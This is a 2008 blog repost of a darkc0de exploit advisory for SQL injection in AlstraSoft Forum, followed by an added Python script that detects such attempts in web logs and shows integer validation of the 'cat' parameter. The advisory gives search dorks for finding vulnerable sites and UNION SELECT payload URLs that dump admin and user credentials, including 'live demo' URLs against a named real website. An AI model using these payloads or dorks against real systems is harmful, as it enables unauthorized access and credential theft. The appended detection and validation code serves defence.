Remote SQL Injection Vulnerability

AlstraSoft Forum (cat) Remote SQL Injection Vulnerability
################################################################
#                  [darkc0de ASCII-art banner]                 #
#      est.2007                          forum.darkc0de.com    #
################################################################
# - d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu #
# - QKrun1x - skillfaker - FeDeReR - Optyx - Nuclear            #
#                   and all darkc0de members                   #
################################################################
#
# Author: r45c4l and P47r1ck
#
# Home  : www.darkc0de.com
#
# Email : r45c4l@hotmail.com, p47r1ckro[at]gmail[dot]com
#
# Share the c0de!
#
################################################################
#
# Exploit: AlstraSoft Forum (cat) Remote SQL Injection Vulnerability
#
#
# App Name:  AlstraSoft Forum
#
# App Home: http://www.alstrasoft.com/
#
# Dork: inurl:index.php?menu=showcat=
# Dork2: Powered By AlstraSoft Forum Pay Per Post Exchange
#
# POC: For Admin id and pass
#      index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin--
#
# P0C-2: For Users id and pass
#       index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1--
#
# Live Demo: (For admin)
#
# http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin–

# Live Demo: (For Users)
#  http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+1,1–
#
#
# Admin panel is at http://site.com/admin
################################################################
# Vuln Discovered 7th Sep 2008

# milw0rm.com
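As an added, defender-side example that is not part of the advisory: the `cat` parameter of `index.php?menu=showcat` is a category id and should only ever be a plain integer, so the check below is the one the application should have applied, and the same check, run over web-server access logs, flags UNION-based injection attempts of the shape shown above. The log lines are constructed for the example, not real traffic.

```python
"""Detect UNION-based injection attempts against the `cat` parameter of
index.php?menu=showcat in access logs, and show the input validation that
would have blocked them. Added example; assumes combined-format log lines."""
import re
from urllib.parse import urlsplit, parse_qs

# Combined-format line; only client ip, timestamp and request path are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Signature of the technique in the advisory: UNION [ALL] SELECT in the
# parameter value, case-insensitive, after parse_qs has decoded +/%20 to spaces.
UNION_RE = re.compile(r'union\s+(all\s+)?select', re.IGNORECASE)

def cat_is_valid(value: str) -> bool:
    """The check the application should apply: a category id is a plain
    non-negative integer (equivalent to PHP ctype_digit plus an (int) cast)."""
    return value.isdigit()

def classify_request(path: str):
    """Return (cat_value, reason) for a showcat request, or None for any other
    request. reason is None when the value passes validation."""
    parts = urlsplit(path)
    qs = parse_qs(parts.query, keep_blank_values=True)
    if not (parts.path.endswith("index.php") and qs.get("menu") == ["showcat"]
            and "cat" in qs):
        return None
    cat = qs["cat"][0]
    if cat_is_valid(cat):
        return cat, None
    if UNION_RE.search(cat):
        return cat, "union-based sql injection attempt"
    return cat, "non-numeric category id"

def scan_log(lines):
    """Yield (ip, timestamp, cat, reason) for every suspicious showcat request."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        result = classify_request(m["path"])
        if result and result[1]:
            yield m["ip"], m["ts"], result[0], result[1]

# Constructed sample log lines (not real traffic) mirroring the PoC shape.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Sep/2008:10:00:01 +0000] "GET /index.php?menu=showcat&cat=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Sep/2008:10:00:07 +0000] "GET /index.php?menu=showcat&cat=-1+union+all+select+1,2,3+from+admin-- HTTP/1.1" 200 4870',
    '203.0.113.9 - - [07/Sep/2008:10:00:12 +0000] "GET /index.php?menu=showcat&cat=-1%20UNION%20SELECT%201,2,3%20from%20users HTTP/1.1" 200 4870',
    '203.0.113.7 - - [07/Sep/2008:10:01:00 +0000] "GET /index.php?menu=showcat&cat=abc HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The first sample line passes validation and is not reported; the two UNION requests and the non-numeric id are.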

Permanent link to this article: http://www.daopo.org/2008/09/08/remote-sql-injection-vulnerability/ | 天晴轩

This post was published by 天晴 on 8 September 2008 in the Articles category; you may comment on it and quote it on your own site or blog provided the original address and author are kept.